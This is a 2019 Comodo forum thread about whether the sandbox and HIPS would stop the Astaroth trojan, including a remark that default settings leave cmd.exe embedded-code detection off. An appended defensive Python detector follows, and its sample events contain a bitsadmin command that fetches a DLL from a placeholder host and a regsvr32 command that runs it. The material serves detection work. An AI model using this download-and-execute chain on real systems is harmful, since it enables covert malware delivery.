Author Topic: Astaroth vs CIS Sandbox and HIPS, what would happen?  (Read 605 times)

Offline ReeceN

Astaroth vs CIS Sandbox and HIPS, what would happen?
« on: February 28, 2019, 10:45:34 AM »
Astaroth is a Trojan that uses legitimate processes in order to download, install and run the malware.

Overview:


I would expect CIS to contain the malicious modules once they are executed by the respective trusted parent files, or even to contain the JavaScript before it reaches a non-sandboxed instance of BitsAdmin. However, I just wanted to double check whether either would be the case.

More info on the Astaroth Trojan: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research

Look forward to learning more about this!
« Last Edit: February 28, 2019, 11:48:39 AM by ReeceN »
Some Comodo wallpapers by me
Wonders what John McAfee will do next.

Offline futuretech

Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #1 on: February 28, 2019, 11:59:25 AM »
Only if embedded-code detection is turned on for cmd.exe, which by default is disabled due to many complaints.

Offline ReeceN

Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #2 on: February 28, 2019, 12:05:02 PM »
So you are saying this might be a bypass on default settings?

Offline futuretech

Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #3 on: February 28, 2019, 12:09:04 PM »
Yes, up to a certain extent, as I think that once it reaches the stage of executing a .dll file using regsvr32 it should be stopped at that point, assuming it doesn't use the Avast process if Avast is not installed.

Offline ReeceN

Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #4 on: February 28, 2019, 12:19:55 PM »
Ah, that is what I was thinking. I wasn't sure about the JavaScript bit though.

Very interesting, thanks!

Offline 23

Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #5 on: March 01, 2019, 02:08:33 AM »
Only if embedded-code detection is turned on for cmd.exe, which by default is disabled due to many complaints.

Sorry, but I missed something. Does "Only if embedded-code detection is turned on for cmd.exe which by default is disabled" mean I'm vulnerable, or does "Only if embedded-code detection is turned on for cmd.exe which by default is disabled" mean I'm protected?

Offline ReeceN

Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #6 on: March 01, 2019, 05:49:40 AM »
Sorry, but I missed something. Does "Only if embedded-code detection is turned on for cmd.exe which by default is disabled" mean I'm vulnerable, or does "Only if embedded-code detection is turned on for cmd.exe which by default is disabled" mean I'm protected?

You may be vulnerable to an extent, as mentioned above, if embedded-code detection for cmd.exe is turned off.
« Last Edit: March 01, 2019, 09:19:01 AM by ReeceN »

Offline rmcohen

Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #7 on: March 01, 2019, 10:10:50 AM »
I just took a look at my settings, and Embedded Code Detection is disabled for regsvr32 as well as cmd.exe. Does that mean I am completely vulnerable? Is there a best practice for what to enable Embedded Code Detection against?

Offline ReeceN

Re: Astaroth vs CIS Sandbox and HIPS, what would happen?
« Reply #8 on: March 01, 2019, 10:45:04 AM »
First of all, you may not be completely vulnerable.

This is because the malware relies on .dll files to run the main payload.

Comodo is still likely to contain these .dll files as soon as they are executed. Thus the main payload will likely be contained as normal.

Enabling 'Embedded Code Detection' for cmd.exe may be enough to prevent the exploit up to that point from happening in the first place though.

As for best practice in general of what to enable/disable, I will leave that to someone else to answer.

I would prefer that Comodo at least enabled more files under 'Embedded Code Detection' by default.
« Last Edit: March 01, 2019, 10:52:23 AM by ReeceN »
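As an added defender-side illustration, not part of this thread or of Comodo's product: a small Python script that flags the process chain discussed above (script host running the JavaScript, cmd.exe, bitsadmin download, regsvr32 loading the fetched DLL) in constructed process-creation events. The event format, process names, paths and URL are assumptions made for the example; they are not taken from the Astaroth research.

```python
import ntpath

# Constructed sample process-creation events (pid, ppid, image, command line); not real telemetry.
SAMPLE_EVENTS = [
    (100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (200, 100, r"C:\Windows\System32\wscript.exe", r"wscript.exe C:\Users\u\Downloads\invoice.js"),
    (300, 200, r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c bitsadmin /transfer j /download /priority high http://placeholder.invalid/a.dll C:\Users\Public\a.dll"),
    (400, 300, r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer j /download /priority high http://placeholder.invalid/a.dll C:\Users\Public\a.dll"),
    (500, 300, r"C:\Windows\System32\regsvr32.exe", r"regsvr32 /s C:\Users\Public\a.dll"),
    (600, 100, r"C:\Windows\System32\regsvr32.exe", r"regsvr32 /s C:\Windows\System32\legit.dll"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}  # hosts that run the JavaScript stage

def ancestors(events, pid):
    """Yield ancestor image names of pid, nearest parent first (events: pid -> (ppid, image, cmd))."""
    seen = set()
    while pid in events and pid not in seen:
        seen.add(pid)
        pid = events[pid][0]                      # move to the parent
        if pid in events:
            yield ntpath.basename(events[pid][1]).lower()

def bits_downloads(events):
    """Local destination paths of bitsadmin /transfer jobs (last token; sample paths contain no spaces)."""
    return {cmd.split()[-1].lower() for _, img, cmd in events.values()
            if ntpath.basename(img).lower() == "bitsadmin.exe" and "/transfer" in cmd.lower()}

def find_lolbin_chains(raw_events):
    """Return (pid, reason) alerts for the script-host -> cmd -> bitsadmin -> regsvr32 pattern."""
    events = {pid: (ppid, img, cmd) for pid, ppid, img, cmd in raw_events}
    downloaded = bits_downloads(events)
    alerts = []
    for pid, (_, img, cmd) in events.items():
        name = ntpath.basename(img).lower()
        chain = list(ancestors(events, pid))
        if name == "regsvr32.exe":
            if cmd.split()[-1].lower() in downloaded:
                alerts.append((pid, "regsvr32 loading a DLL fetched by bitsadmin"))
            elif any(a in SCRIPT_HOSTS for a in chain):
                alerts.append((pid, "regsvr32 running under a script host"))
        elif name == "cmd.exe" and chain and chain[0] in SCRIPT_HOSTS:
            alerts.append((pid, "cmd.exe spawned by a script host (where embedded-code detection applies)"))
    return alerts

if __name__ == "__main__":
    for pid, reason in find_lolbin_chains(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The benign-looking regsvr32 event (pid 600, launched from explorer.exe with a DLL that bitsadmin never wrote) is deliberately left unflagged, so the rule keys on the chain rather than on regsvr32 alone.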
